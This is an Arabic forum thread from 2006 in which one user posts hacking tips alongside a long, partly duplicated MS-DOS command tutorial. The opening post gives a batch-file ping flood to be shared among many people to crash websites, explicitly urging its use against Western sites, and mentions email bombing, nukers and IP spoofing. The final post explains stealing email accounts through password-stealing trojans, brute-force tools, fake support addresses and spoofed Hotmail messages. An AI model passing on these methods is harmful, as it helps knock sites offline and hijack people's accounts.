ثلاث طرق لاختراق المواقع
1: استخدام الثغرات
2: بعض أنظمة التشغيل القويه مثل اليونكس و اليونكس
3: برامج اللسته : و هي الأطول وللمبتدأين
وتعتمد برامج اللسته عل لستة كبيره تحتوي اكبر قدر ممكن من الكلمات بالاضافه الى البرنامج الأساسي الذي يستخدم اللسته في تخمين كلمة السر
==============================================
تدمير المواقع --------------
وهي عن طريق برامج ping وهي التي تبطئ الموقع و تثقل حتى يتوقف وتكون اما عن طريق الدوس او برامج معينه مثل evil ping وتحتاج الى عدد كبير من المشاركين تصل الى اكثر من 20 شخص حتى يأثروا بالموقع..
يا شباب ،،
هذه طريقة لاختراق أقوى المواقع في العالم ،، لكنها تحتاج إلى تنظيم ،، أي لأكثر من شخص و هي ببساطة تعتمد على تدمير السيرفر الخاص بالموقع عن طريق تحميله فوق طاقته ،،
نبدأ على بركة الله ،، و للعلم هذه الطريقة تدمر المواقع الشخصية بصورة شخصية فالرجاء عدم استخدامها إلا في تدمير المواقع الغربية , و من يخالق عقابه على الله
*****&&&&&&&&&&^^^^^^^^^^^^^الشرح^^^^^^^^^^&&&&&&& &&*****
نذهب إلى الدوس و نقوم بكتابة الأمر التالي بمنتهى البساطة
edit deadline.bat
تظهر لنا شاشة ال edit الزرقاء الخاصة بالدوس ،، نقوم بكتابة الأمر التالي :
ping www.www.www
حيث أنه في موقع الwww.www.www يتم كتابة العنوان الكامل للموقع ززز
الآن نحفظ البرنامج و نخرج من الدوس
فنشاهد على المكتب desktop ايقونة باسم deadline.batعند الضغط عليها تظهر شاشة الدوس و تقوم بكتابة مستمرة لأمر ping www.www.www و في كل مرة يتم ارسال كمية من المعلومات
الآن يجب ارسال هذا الملف (deadline.bat) لأكبر عدد من الشركاء و القيام بعمل ال ping اللموقع المراد بنفس الوقت حتى (( بووم)) السيرفر
و هكذا بعد الاستمرار بـ الping لمدة حوالي ساعة متواصلة يتدمر السيرفر باذن الله و ان شاء الله
=============================================
اختراق البريد ------------- عدد لانهائي من الطرق و الحيل
ولكنه ليس صعب ولكن يحتاج الى الذكاء
ومن اسهلها ان تخترق جهاز الضحيه بأحد برامج الأختراق وتذهب الى قائمه الباسووردات المحفوضه ( اذا كان حافض الباس وورد راح تلقاها مع اسم بريده)
شفتوا الحين ليش لازم نحذف ملف الباسورد
==============================================
تدمير و تفجير البريد --------------------
وهو سهل و بسيط عن طريق إغراق البريد بإرسال حتى يتوقف و هناك برامج تسهل تلك العملية
==============================================
Nuke Programs ---------------
وهي برامج تقوم بفصل صاحب الايبي من الاتصال
==============================================
Spoofing Programs ------------------
وهي تغير الايبي الى رقم آخر و يستفاد منها في الاختراق و بعد الأوقات تتوقف عليها اي بمعنى اخر للتمويه حتى لا يتمكن احدا من معرفة ال ip الحقيقي لجهازك..
==============================================
******* --------
هي عبارة عن عن ملفات يرسلها الموقع لمتصفحك و هي عباره عن ملف مكتوب لا يستطيع أي موقع قر ائته غير هذا الموقع و قد يكون به كلمات
سر موقع أو اشتراك ...
وهي مزعجه في بعض الأحيان حيث أنها مثلا تسجل كل المواقع التي دخلتها و كل الصفحات
التي شاهدتها و مدة مشاهدة كل صفحه ...
لذلك فهي خطيرة جدا ..
شوفتوا هلأ ليش ملفات الكوكيز لازم نحذفها
===============================================
Ports
--------
وهي المنافذ التي يتسلل منها الهكرز لجهازك
===============================================
Port Scanner -------------
وهي برامج تفحص المنافذ المفتوحة لديك و تخبرك بها و تخبرك عن البرنامج المسؤول عنها مثل super scan برنامج xhack برنامج ممتاز وايضا عن طريق احد المواقع اللتي يفحص جهازك مجانا مثل www.anti-trojan.net
linkin park
10-11-2006, 03:08 AM
شرح كامل 100% وكل ما يتعلق بال ( Dos ) الدوس
السلام عليكم ورحمة الله وبركاته
كلمة (DOS) اختصار لـ Disk Operating System
تعريف الـ DOS : هو مجموعة من الأوامر والتعليمات التي تتحكم في مكونات الحاسب الآلي.
دور الـ DOS في جهاز الكمبيوتر: هو حلقة الوصل بين الكمبيوتر والمستخدم.
الملفات:
ينقسم اسم الملف إلي قسمين:
القسم الأول: وهو الأساس ( ROOT ) ويجب ألا يزيد طوله عن 8 حروف. وهذا الجزء من اسم الملف ضروري - إي يجب وجوده.
القسم الثاني: ويسمى الامتداد ويجب ألا يزيد طوله عن 3 حروف، ويجب أن يفصل بين الاسم ( الأساس) و الامتداد بعلامة النقطة ( . ). وهذا الجزء من الاسم اختياري - يمكن الاستغناء عنه.
جميع الملفات التي تنتهي بأحد الإمدادات التالية BAT , EXE , COM قابلة للتحميل والتنفيذ المباشر.
ونبين هنا بعض أشهر أنواع الإمدادات المستخدمة مع أسماء ملفاتها الكاملة:
.BAT ملف أوامر تنفذ دفعة واحدة ( BATCH ).
.COM ملف برنامج ( COMMAND ).
.EXE ملف جاهز للتنفيذ ( EXECUTABLE ).
.DOC ملف نصوص أو وثائق ( ************************************************** ************************************************** ************************************************** ).
.ASM ملف مصدر برنامج مكتوب بلغة التجميع ( ASSEMBLY ).
.BAK ملف احتياطي ( BACKUP ).
.BAS ملف برنامج بيسك ( BASIC ).
.DBF ملف قاعدة بيانات ( DBASE FILE ).
.PAS ملف برنامج مكتوب بلغة باسكال ( PASCAL ).
.SYS ملف تكوين نظام ( SYSTEM ).
.C ملف مصدر مكتوب بلغة سي ( C ).
الرموز المستخدمة في تسمية الملفات:
1-الحروف الأبجدية من A إلي Z ( سواء كانت صغيرة أو كبيرة ).
2-الأرقام من 0 إلي 9 .
3-بعض العلامات مثل: ( { } ، ( ) ، & ، % ، $ ، # ، ! ).
==============
الشروط التي يجب مراعاتها عند اختيار اسم الملف:
1- طول الاسم الأساسي للملف من 1-8 حروف.
2- يجب ألا يزيد الاسم الممتد -إن وجد- عن 3 أحرف.
3- أن يفصل بين الاسم الأساسي والاسم الممتد -إن وجد- بعلامة النقطة ( . ).
4- أن يكتب الاسم الأساسي والاسم الممتد بدون فراغات.
5- عدم استخدام مفاتيح التحكم وهي : ( ALT ، CTRL ، ESC ) في أي اسم .
6- عدم استخدام الأسماء المحجوزة لنظام التشغيل مثل CON الخاص يلوحة المفاتيح و
شاشة العرض أو PRN الخاص باسم الطابعة.
7- عدم استخدام الرموز ذات الدلالة الخاصة لنظام التشغيل وهي * ، / ، \\ ، + ، =
، ؟).
==================
تنظيم الملفات على القرص:
للحصول على ملفات منظمة على القرص يجب إنشاء الدليل ( Directory ) فذلك يسهل
تعريف الدليل ( Directory ): هو عبارة عن مجموعة ملفات توضع تحت مسمى دليل معين.
1-الدليل الرئيسي: وهو الدليل الذي يقوم Dos بإنشائه تلقائياً عند تشكيل الاسطوانة
وتوضع تحته جميع الملفات المنشأة.
2-الدليل الفرعي: وهو الذي ينشأ تحت دليل رئيسي ( subdirectory ).
ونظرا لأن مستخدم الكمبيوتر يتعامل مع عدد كبير من الملفات لذلك يفضل أن توزع هذه الملفات في أدلة فرعية.
• ويمكن إنشاء الأدلة الفرعية داخل الدليل الرئيسي أو داخل أدلة فرعية أخرى.
• الفرق بين الدليل الرئيسي والدليل الفرعي: هو أن النظام ينشئ الدليل الرئيسي
تلقائياً، بينما ينشئ المستخدم الدليل الفرعي.
• يوجد دليل رئيسي واحد في كل قرص بينما قد يوجد في القرص عدة أدلة فرعية.
-الدليل الأبوي: وهو نوع من الأدلة تتفرع منه أدلة فرعية عديدة فيصبح دليلاً أبوياً لهم.
ومثال على ذلك:
SCHOOL\\CLASS
إن الدليل ( SCHOOL ) في المثال السابق يعتبر دليلاً أبوياً للدليل الفرعي ( CLASS).
=======================
4-الدليل الحالي: وهو الدليل الذي يكون مستخدما وقت العمل عليه ، وكذلك هو الدليل الذي يتم التعامل مع ملفاته بدون أن يسبقها اسم دليل آخر - لا يرتبط بدليل أبوي.
• طريقة تحميل نظام التشغيل من الأسطوانة المرنة: هناك طريقتين لعمل ذلك :
الطريقة الأولى: ( يجب أن يكون الجهاز مغلق )
1-ندخل اسطوانة الدوس في محرك الأقراص A.
2-نقوم بتشغيل جهاز الكمبيوتر .
الطريقة الثانية: (حين يكون الجهاز يعمل)
1-ندخل اسطوانة الدوس في محرك الأقراص A.
2-نقوم بالضغط على المفاتيح التالية معا: ALT + CTRL + DELETE .
• رموز محركات الأقراص في نظام التشغيل ( DOS ):
1- الأسطوانة المرنة ( Floppy Disk ): ويوجد هناك نوعين من الأسطوانات المرنة وهما :
أ-أسطوانة مرنة حجم 3.5 بوصة.
ب-أسطوانة مرنة حجم 5.25 بوصة.
• ويرمز لمحرك الأسطوانات المرنة بالرمز A أو B.
2-القرص الصلب ( Hard Disk ): ويرمز له بالرمز C.
3- ( CD-ROM ): ويرمز له بالرمز D أو E.
========================================
• طريقة التنقل بين محركات الأقراص: بالضغط على الرمز ثم نلحقه بـ :
========================================
• الملفات الأساسية لنظام التشغيل الـ ( DOS ):
يتكون نظام التشغيل من ثلاثة ملفات أساسية تمثل البنية الأساسية للنظام والعمود
الفقري له وهي كالتالي:
أولاً: IO.SYS : وهذا الملف خاص بالتحكم في الإدخال والإخراج.
ثانياً: MSDOS.SYS : وهذا الملف يحتوي على مجموعة كبيرة من الأوامر التي توضع في
الذاكرة عند التشغيل.
ثالثاً: COMMAND.COM : وهذا الملف يحتوي على جميع أوامر نظام التشغيل الداخلية .
• مكونات نظام التشغيل:
ينقسم نظام التشغيل إلي ثلاثة أجزاء رئيسية :
الجزء الأول منه يتحكم في الأجهزة والجزء الثاني عبارة عن مجموعة من التعليمات
والأوامر تعمل بصورة تلقائية لا دخل للمستخدم فيها ولا يمكنه التحكم بها وهي مخزنة
في ذاكرة القراءة فقط ( ROM ) والتي لايمكن مسحها أو تعديلها والجزء الثالث عبارة
عن مجموعة من الأوامر و البرامج تعتبر خدمات للمستخدم وتيسر له استخدام الكمبيوتر
• الاختصارات :
يستخدم نظام التشغيل ( DOS ) اختصارين اثنين عوضاً عن أسماء الملفات أو جزء منها
داخل صيغة الأوامر وهما:
1) الرمز ( ? ) : ويستخدم للدلالة على غياب حرف واحد فقط من اسم أحد الملفات.
2) الرمز ( * ) : ويستخدم للدلالة على غياب أي عدد من الحروف (بشرط أن لا يتجاوز 8
أحرف).
• الأوامر:
تنقسم أوامر الـ DOS إلى قسمين:
1- الأوامر الداخلية : وهي الأوامر التي يتم تحميلها إلى ذاكرة الـ RAM أثناء تشغيل
الجهاز ويتم تنفيذها من الذاكرة بمعنى أن هذا النوع من الأوامر لا يستلزم وجود
أسطوانة لتنفيذه.
من أمثلة الأوامر الداخلية:
CLS - TIME - DATE - MD - CD - RD - DIR - DEL
2-الأوامر الخارجية : وهي الأوامر التي لا يتم تحميلها إلى ذاكرة الـ RAM أثناء
تشغيل الجهاز وإنما تبقى على الأسطوانة وليتم تنفيذ إي أمر منها يشترط وجود اسطوانة
نظام التشغيل داخل المشغل المرن أو الصلب.
من أمثلة الأوامر الخارجية:
FORMAT - DISKCOPY - DISKCOMP - COMP - SYS - EDIT
• تنقسم أوامر نظام التشغيل الداخلية والخارجية إلي ستة أنواع :
1-أوامر النظام:
MEM
DATE
VER
DosKey
PROMPT
CLS
VSAFE
MEMMAKER
MODE
COMMAND
MSD
TIME
DEFRAG
2-أوامر الاسطوانة:
SCANDISK
CHKDSK
FORMAT
DISKCOMP
DISKCOPY
MSBACKUP
SYS
LABEL
FDISK
UNFORMAT
VOL
3-أوامر الفهرس:
APPEND
DIR
CD
RD
MOVE
DATE
DELTREE
MD
TREE
4-أوامر الملفات:
TYPE
COPY CON
COPY
ATTRIB
DEL
REN
UNDELETE
XCOPY
PRINT
FIND
EDIT
SORT
MSAV
MORE
HELP
5-الأوامر الحزمية:
REM
CALL
ECHO
FOR
IF
PAUES
SHIFT CHOICE LOADFIX
SHARE
FASTHELP
NLSFUNC
CTTY
INSTALL.HIGH
RECOVER
GOTO
6-أوامر خاصة ونادرة الاستخدام:
FASTOPEN
MSCDEX
CHCP
INTERLNK
QBASIC
DRVSPACE.SYS
DEBUG
KEYB
EXPAND
DRVSPACE
SUBST
LOAD HIGH
INTERSVR
GRAPHICS
VERIFY
REPLACE
POWER
• شرح لأهم الأوامر المستخدمة في نظام الـ DOS :
1-الأمر: VER ( وهو اختصار كلمة VERSION وتعني إصدار ) وهو من الأوامر الداخلية
ووظيفته الاستعلام عن رقم إصدار نظام التشغيل الـ MS-DOS .
ومثال على ذلك قم بكتابة الأمر VER في الـ DOS:
ثم بالضغط على مفتاح ENTER سيظهر MS-DOS VER 6.22 .
• ملاحظة: هذه الإجابة تختلف من جهاز إلي آخر حسب نسخة نظام التشغيل .
2-الأمر: DATE ( التاريخ ) وهو من الأوامر الداخلية ووظيفته عرض التاريخ الموجود
بالجهاز مع إمكانية تعديله.
ومثال على ذلك قم بكتابة الأمر DATE في الـ DOS:
ثم بالضغط على مفتاح ENTER سيظهر current Date is THU 03-25-99 وكذلك Enter New
Date mm-dd-yy للتعديل ولإدخال التاريخ الجديد تسجل أولاً الشهر ثم اليوم ثم السنة
وإذا لم نرغب في كتابة تاريخ جديد يكفي الضغط على مفتاح الإدخال ENTER بدون كتابة إي شئ.
• ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب التاريخ .
•شروط كتابة التاريخ في نظام التشغيل DOS:
1-نظام التشغيل لا يقبل إي تاريخ قبل سنة 1980.
2-لا يمكن استخدام التاريخ الهجري.
3-لا يمكن كتابة الأشهر بالحروف.
4-لا يمكن استخدام النقطتين الرأسيتين : كفاصل بين في التاريخ
5-أن تستخدم في كتابة التاريخ النظام الأمريكي (mm-dd-yy) الشهر ثم اليوم ثم السنة .
3-الأمر: TIME ( الوقت ) وهو من الأموامر الداخلية ووظيفته عرض الوقت المسجل داخل
جهاز الحاسب مع إمكانية تعديله.
ومثال على ذلك قم بكتابة الأمر TIME في الـ DOS
ثم بالضغط على مفتاح ENTER سيظهر current Time is : 4:55.75a وكذلك Enter New
Time للتعديل وذلك بأن تسجل أولاً الساعات ثم الدقائق ثم الثواني ثم كسر الثواني ثم
تحديد الوقت صباحاً أو مساءاً وإن لم ترغب في كتابة وقت جديد يكفيك الضغط على مفتاح الإدخال ENTER بدون كتابة إي شئ .
•ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب الوقت .
4-الأمر: CLS ( وهو اختصار لجملة Clear The Screen وتعني مسح الشاشة ) وهو من الأوامر الداخلية ووظيفته هي تنظيف الشاشة من كافة البيانات التي عليها وإرجاع محث التشغيل إلي أول سطر على الشاشة مهما كان موقعه أثناء تنفيذ الأمر.
ومثال على ذلك قم بكتابة الأمر CLS في الـ DOS :
ثم بالضغط على مفتاح ENTER سيتم تنظيف الشاشة من البيانات الموجودة عليها وليس مسح البيانات.
5-الأمر : PROMPT وهو من الأوامر الداخلية ووظيفته تغيير شكل محث التشغيل لنظام
التشغيل.
ومن أهم استخدامات الأمر PROMPT التالي:
PROMPT $D تغيير شكل المحث C إلي علامة تاريخ اليوم
PROMPT $T تغيير شكل المحث C إلي علامة الوقت الحالي
PROMPT $Q تغيير شكل المحث C إلي علامة =
PROMPT $$ تغيير شكل المحث C إلي علامة $
PROMPT $V تغيير شكل المحث C إلي رقم إصدار نظام التشغيل
6-الأمر: VOL ( وهو اختصار لكلمة Volume Label ) وهو من الأوامر الداخلية ووظيفته عرض اسم الأسطوانة الداخلي
ومثال غلى ذلك قم بكتابة الأمر VOL في الـ DOS
ثم بالضغط على مفتاح ENTER سيظهر Volume in drive C is alwafa
•ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب اسم القرص .
7-الأمر : DIR وهو من الأوامر الداخلية ووظيفته عرض الملفات الموجودة على الفهرس
الحالي ومن خلاله نستطيع عرض :
1-اسم الاسطوانة والرقم المسلسل لها.
2-اسم الفهرس الحالي والمسار الحالي له.
3-عرض الملفات الموجودة بخمس بيانات(اسم الملف -نوع الملف (امتداده) -مساحة الملف بالبايت (حجم الملف)-تاريخ إنشاء الملف -وقت إنشاء الملف) .
4-عرض الفهارس الموجودة بأربعة بيانات وهي (-اسم الفهرس-علامة الفهرس وتكون على الشكل < DIR > بجوار اسم الفهرس-تاريخ إنشاء الفهرس -وقت إنشاء الفهرس ).
5-رسالة تعرض إجمالي عدد الملفات الموجودة بالفهرس الحالي والذي يتم عرضه وكذلك المساحة الكلية لهذه الملفات.
6-المساحة الحرة أو الشاغرة على الاسطوانة أو القرص
أهم صور استخدامات الأمر DIR:
DIR/P لعرض الملفات صفحة صفحة
DIR/W لعرض الملفات بعرض الشاشة
DIR/B لعرض أسماء الفهارس والملفات ونوعها فقط
DIR/L لعرض أسماء الفهارس والملفات بالحروف الصغيرة
DIR/S لعرض كل الملفات والفهارس الموجودة بالفهرس الحالي
DIR/O لعرض الفهارس والملفات مرتبة ترتيب أبجدي من A إلي Z
DIR/OS لعرض الفهارس والملفات مرتبة حسب مساحتها بالبايت من الأصغر إلي الأكبر
DIR/AH عرض الملفات المخفية فقط
DIR/AR عرض ملفات القراءة فقط وهي محمية من الإلغاء
DIR/AS عرض ملفات النظام فقط
DIR/AD عرض جميع الفهارس فقط بدون الملفات
DIR/AA عرض الملفات التي تحمل علامة الأرشيف فقط
8-الأمر: MD ( وهو اختصار لكلمة Make Directory ) وهو من الأوامر الداخلية ووظيفته إنشاء فهرس فرعي من الفهرس الرئيسي أو إنشاء فهرس فرعي من فهرس فرعي آخر.
9-الأمر : CD (وهو اختصار لكلمةChange Directory ) وهو من الأوامر الداخلية ووظيفته:
1-معرفة الفهرس الحالي
2-الانتقال بين الفهارس إما من:
• رئيسي إلي فرعي
• فرعي إلي رئيسي
وإذا أردنا معرفة الفهرس الحالي الذي نقف عليه نكتب الأمر CD فقط ثم نقوم بالضغط
على مفتاح ENTER
10-الأمر RD ( وهو اختصار لكلمة Remove Directory ) وهو من الأوامر الداخلية ووظيفته حذف أو إزالة الفهرس الفرعي ،ولحذف أو إزالة إي فهرس فرعي فهناك شرطين:
1- إزالة جميع الملفات والبرامج الموجودة داخل الفهرس الفرعي المراد إزالته.
2- ألا يكون الفهرس الفرعي المراد إزالته هو الذي نقف عليه الآن بل يجب أن نكون على
فهرس آخر أعلى منه رتبة.
11-الأمر : COPY وهو من الأوامر الداخلية ووظيفته نسخ ملف أو مجموعة ملفات في نفس الفهرس أو فهرس آخر أو في أسطوانة أخرى.
12-الأمر: COPY CON وهو من الأوامر الداخلية ووظيفته إنشاء وكتابة ملفات نصية جديدة من لوحة المفاتيح وعرضها وطباعتها.
ومن عيوب الأمر COPY CON إنه:
1-لا يمكن الصعود لسطر قد تمت كتابته وتم الضغط على مفتاح الإدخال ENTER.
2-لا يمكن فتح ملف للتعديل به بعد حفظه من نفس الأمر بل يكون من محرر النصوص
الموجود مع نظام التشغيل DOS وهو EDIT .
• ملاحظة:لحفظ الملف المنشأ عن طريق الأمر COPY CON قم بعمل إحدى الخطوات التالية:
أ-الضغط على مفتاحي ctrl+z ثم الضغط على مفتاح الإدخال.
ب-الضغط على مفتاح F6 ثم الضغط على مفتاح الإدخال.
13-الأمر: TYPE وهو من الأوامر الداخلية ووظيفته عرض محتويات الملفات النصية على
الشاشة.
• ملاحظة:يقوم هذا الأمر بعرض الملفات النصية أما الملفات التي من النوع EXE-COM-SYS فلا يمكن عرضها .
14-الأمر: REN (وهو اختصار لكلمة Rename ) وهو من الأوامر الداخلية ووظيفته تغيير
اسم الملف أو نوعه أو كلاهما .
مثال(1):
15-الأمر: DEL ( وهو اختصار لكلمة DELETE ) وهو من الأوامر الداخلية ووظيفته مسح
ملف أو مجموعة ملفات في نفس الفهرس أو في فهرس آخر أو في أسطوانة أخرى.
ملاحظة: في حال مسح كل الملفات لا بد من ظهور الرسالة التأكيديه التالية:
All Files in directory will be deleted
Are you Sure Y/N
وإذا أردت حذف جميع الملفات أضغط حرف Y وإذا أردت إلغاء العملية اضغط N.
محددة من الفهارس على أسطوانة واحدة أو عدة أسطوانات وذلك حتى يسهل التعامل مع
الملفات الواقعة عليها من إي موقع ويدرج أمر PATH إلى ملف Autoexec.bat في سطر واحد
(لو تكرر الأمر وبصورة مختلفة سيحفظ منه فقط آخر صورة له في آخر سطر ) ويوصف بداخله
كل الفهارس التي نرغب بالتعامل معها مباشرة بدون إستخدام الأمر CD للدخول إليها.
• ملاحظة:يقوم هذا الأمر بعرض الملفات النصية أما الملفات التي من النوع EXE-COM-SYS فلا يمكن عرضها .
14-الأمر: REN (وهو اختصار لكلمة Rename ) وهو من الأوامر الداخلية ووظيفته تغيير
اسم الملف أو نوعه أو كلاهما .
مثال(1):
15-الأمر: DEL ( وهو اختصار لكلمة DELETE ) وهو من الأوامر الداخلية ووظيفته مسح
ملف أو مجموعة ملفات في نفس الفهرس أو في فهرس آخر أو في أسطوانة أخرى.
ملاحظة: في حال مسح كل الملفات لا بد من ظهور الرسالة التأكيديه التالية:
All Files in directory will be deleted
Are you Sure Y/N
وإذا أردت حذف جميع الملفات أضغط حرف Y وإذا أردت إلغاء العملية اضغط N.
محددة من الفهارس على أسطوانة واحدة أو عدة أسطوانات وذلك حتى يسهل التعامل مع
الملفات الواقعة عليها من إي موقع ويدرج أمر PATH إلى ملف Autoexec.bat في سطر واحد
(لو تكرر الأمر وبصورة مختلفة سيحفظ منه فقط آخر صورة له في آخر سطر ) ويوصف بداخله
كل الفهارس التي نرغب بالتعامل معها مباشرة بدون إستخدام الأمر CD للدخول إليها.
• ملاحظات هامة:
1-يوضع أمر PATH داخل ملف Autoexec.bat في سطر واحد .
2-من الممكن كتابة أمر PATH على إي مشغل أقراص في كل مرة تفتح فيها حاسبك.
مثال على ذلك قم بكتابة الأمر PATH على الـ DOS لكي تعرف اسم المسار الموجود
بالجهاز.
17-الأمر: MEM وهو من الأوامر الخارجية ووظيفته إعطاء تقارير كاملة عن حالة جميع
أنواع الذاكرة.
18-الأمر: MODE وهو من الأوامر الخارجية ووظيفته:
1-التحكم في حجم الكتابة وعرضها على الشاشة.
2-إعطاء تفاصيل عن الملحقات المتصلة بالحاسب وما إذا كانت متصلة معه على التوالي أو على التوازي.
19-الأمر: DOSKEY وهو من الأوامر الخارجية ووظيفته:
1-استدعاء وتعديل اسطر الأوامر وذلك باستدعاء كل ما سبق تنفيذه من أوامر .
2-إنشاء ما يسمى بالماكرو ( Macros ) وهو عبارة عن مجموعة من الأوامر تجمع تحت اسم واحد ويعطى لها مفتاح معين لتشغليها بخطوة واحدة.
• ملاحظة هامة: الأمر DOSKEY يقوم بحجز 4 كليو بايت من الذاكرة الأساسية.
20-الأمر: MSD وهو من الأوامر الخارجية ووظيفته:
1-اكتشاف مواصفات الحاسب من حيث:
( نوع المعالج - حجم الⵀاكرة - أنواع مشغلات الأقراص - مواصفات نظام العرض - وباقي المكونات).
2-الحصول على تقارير فنية تفيد باكتشاف المشاكل التي حدثت على الحاسب مثل تلف شرائح الذاكرة الـ RAM .
21-الأمر: Command وهو من الأوامر الخارجية ووظيفته تفسير أوامر نظام التشغيل الداخلي.
22-الأمر: DEFRAG وهو من الأوامر الخارجية ووظيفته تتمثل برفع كفاءة التشغيل للقرص الصلب أو القرص المرن حيث إنه يقوم بتجميع الملفات المبعثرة إلي جوار بعضها وبالتالي توفير مساحة إضافية.
23-الأمر: FORMAT وهو من الأوامر الخارجية ووظيفته تهيئة الأسطوانة الصلبة أو المرنة.
24-الأمر: LABEL وهو من الأوامر الخارجية ووظيفته إعادة تسمية الاسطوانة أو تعديل إسمها أو مسحه.
25-الأمر: DISKCOPY وهو من الأوامر الخارجية ووظيفته نسخ أسطوانة مرنة على أخرى
مطابقة لها تماما من حيث النوع والحجم والسعة ويقوم بنسخ كامل الملفات حتى المخفية.
ملاحظة : (الأمر COPY والأمر XCOPY لا يستطيعان نقل الملفات المخفية).
26-الأمر: CHKDSK وهو من الأوامر الخارجية ووظيفته فحص الأسطوانة وإعطاء تقرير عن حالتها.
27-الأمر: UNFORMAT وهو من الأوامر الخارجية ووظيفته إستعادة محتويات أسطوانة ما
كانت قد مسحت جميع محتوياتها من خلال الأمر FORMAT.
• ملاحظة هامة:
يستطيع الأمر UNFORMAT إعادة محتويات الأسطوانة التي سبق عمل تهيئة لها ولكن بشرط
عدم إستخدامها مسبقاً مع الأمر FORMAT عند التهيئة وإلا فأنه يستحيل إعادة محتويات
الأسطوانة كما كانت .
28-الأمر: SYS وهو من الأوامر الخارجية ووظيفته:
1-نسخ ملفات نظام التشغيل MS-DOS إلي أسطوانة ما.
2-نسخ ملف COMMAND.COM إلي أسطوانة ما.
29-الأمر: DISKCOMP وهو من الأوامر الخارجية ووظيفته المقارنة بين اسطوانتين متطابقتين .
ملاحظة: هذا الأمر لا ينفع التعامل به مع أقراص صلبة على الإطلاق.
30-الأمر: SCANDISK وهو من الأوامر الخارجية ويستخدم لاكتشاف إي أجزاء تالفة على القرص .
31-الأمر: FDISK وهو من الأوامر الخارجية ووظيفته تهيئة وإعداد القرص الصلب للتعامل مع نظام التشغيل DOS.
32-الأمر: TREE وهو من الأوامر الخارجية ووظيفته عرض أسماء الفهارس المكونة لشجرة الفهارس وكذلك عرض مساراتها.
33-الأمر: MOVE وهو من الأوامر الخارجية ووظيفته نقل ملف أو أكثر أو فهرس فرعي من مكان لآخر.
34-الأمر: DELTREE وهو من الأوامر الخارجية ووظيفته حذف فهرس فرعي بما يحتويه حتى لو كان بداخله ملفات.
35-الأمر: UNDELETE وهو من الأوامر الخارجية ووظيفته استعادة الملفات الممحاة بواسطة الأمر DEL.
ملاحظات هامة:
1-عندما يتم حذف ملف بالأمر DEL فإن نظام التشغيل DOS يقوم بتغيير الحرف الأول من هذا الملف وتحويله إلي علامة استفهام ؟.
2-يمكن استرجاع ملف قبل تخزين إي ملف آخر جديد على الملف السابق.
36-الأمر: ATTRIB وهو من الأوامر الخارجية ووظيفته يعرض ويتحكم في صفحات الملف وذلك
بتغيير خصائصه كجعله مثلاً ملف خفي أو ملف نظام أو قابل للقراءة فقط أو غير ذلك.
37-الأمر: PRINT وهو من الأوامر الخارجية ووظيفته طباعة الملفات النصية فقط.
38-الأمر: XCOPY وهو من الأوامر الخارجية ووظيفته نسخ مجموعة من الملفات أو الفهارس .
39-الأمر: EDIT وهو من الأوامر الخارجية وهو عبارة عن محرر نصوص تابع لنظام التشغيل
DOS والذي من خلاله تتمكن من كتابة وتعديل الملفات.
• ملاحظات هامة:
يعالج هذا الأمر جميع عيوب الأمر COPY CON حيث أنه باستخدامه يمكن عمل الآتي:
1-فتح ملف سبق حفظه والتعديل فيه.
2-التحرك داخل الملف يميناً ويساراً ولأعلى ولأسفل .
3-يتم حفظ الملف باستخدام Alt+F ثم نختار أمر Save ثم كتابة أسم الملف.
• يتم الخروج من الأمر باستخدام Alt+F ثم نختار أمر Exit.
• لكي يعمل الأمر EDIT لابد من وجود ملف QBASIC.EXE
ننتظر احلى ردود من احلى اعضاء
linkin park
10-11-2006, 03:11 AM
لنا عودة بمزيد من الدروس بعد الفاصل
وكمان لنشوف ردودكم ...:gives:
linkin park
10-12-2006, 01:04 AM
طرق اختراق الايميل!!
--------------------------------------------------------------------------------
}{مقدمه}{
وكالعاده سوف اقوم لاعطائك انواع اختراق الايميلات وهي :
1- عن طريق معرفة المعلومات للضحيه
2-عن طريق زرع التروجونات في جهاز الضحيه
3-برامج القواميس
4-على الذكاء...!!!!!
5-الثغرات
6-الكود
7-المتصفح وزرع الباتش فيه
8-تفجير الايميل
==================================================
=========
}{المعلومات}{
1- معرفة المعلومات اللازمه عن الشخص:
طبعا هذه الطريقه من اختراق الايميل لاتعتبر اختراق بحد ذاته وانما ذكاء من الخترق للايميل
وهي معرفة بعض المعلومات عن الايميل المراد اختراقه وارسال رساله الى service_x@hotmail.com
واذا اقتنعوا انه صحيح سوف يرسلون لك رساله بكلمة المرور
اليس هذه النقطه سهله
لكن يجب انت تعرف المعلومات
==================================================
==========
}{التروجونات}{
2- عن طريق التروجونات والباتشات التي ترسل للشخص مراد سرقة ايميله
فهناك باتشات اذا ارسلتها ترسل على ايميلك جميع كلمات السر
التي تكون محفوظه بالكوكايز واشهرها
barock و Barrio Trojan
وهناك
برامج اخرى مثل
k2ps
فهذه انا اعتبرها الافضل
فهي ترسل لك رساله اذا شخص دخل ايميله حتى ولو لم يحفظ في ملف الكوكيز
وهناك ايضا برامج بما تسمى بالسب سفن والهاك اتاك اذا اخترقت جهاز الشخص ممكن ان تجد
كلمة السر في ملف الكوكيز
==================================================
=======
}{برامج القواميس}{
3- عن طريق برامج اللسته او برامج التخمين والتي تعرف
بالقواميس وايضا تعرف بـ
Brute Forcer
وهي مشهوره مثل
wwwhack و $$$ cracker و munga bungas
وطريقة عمل هذه البرامج هي التخمين لا اكثر
فهي تقوم بتخمين كلامات السر الموجوده باللسته او القاموس
فالقواميس كثيره لكن نسبة نجاحها هل تعلم كم
؟؟؟؟؟؟؟؟؟؟؟؟؟؟
نسبة نجاحها 1% نعم واحد بالمئه
قد اكون بالغت قليلا فنسبة نجاحها 0%
فاتحدى اي شخص يقول انا اخترقت ايميل عن طريق هذه البرامج فهذه البرامج مستخدمينها كثيرين
والنتائج لا شيء
==================================================
=========
}{الذكاء}{
فالطريقه هذه تعتمد على الذكاء انت وعقلك استخدم عقلك قي سرقة ايميله
يعني عن طريق اللف والدوران وخدع الضحيه انت تقول شولون انا راح اعطيك بعض
الطرق وانت استنتج الطريقه
وبعد كذا راح تسوي حركات ذكيه اكثر من كذا
فلاتنسى ان الحرب خدعه
لنبدا
افتح ايميل مشابه لايميلات الهوتميل مثلا
service_x@hotmail.com
عاد انت وطريقتك الخاصه
وارسل للشخص رساله من ايميل الهوتميل نفسه تقولي وشلون انا اقولك
عن طريق برامج ضرب الايميل تحط ايميل حق شركه هوتميل
وترسل للشخص المراد سرقة ايميله
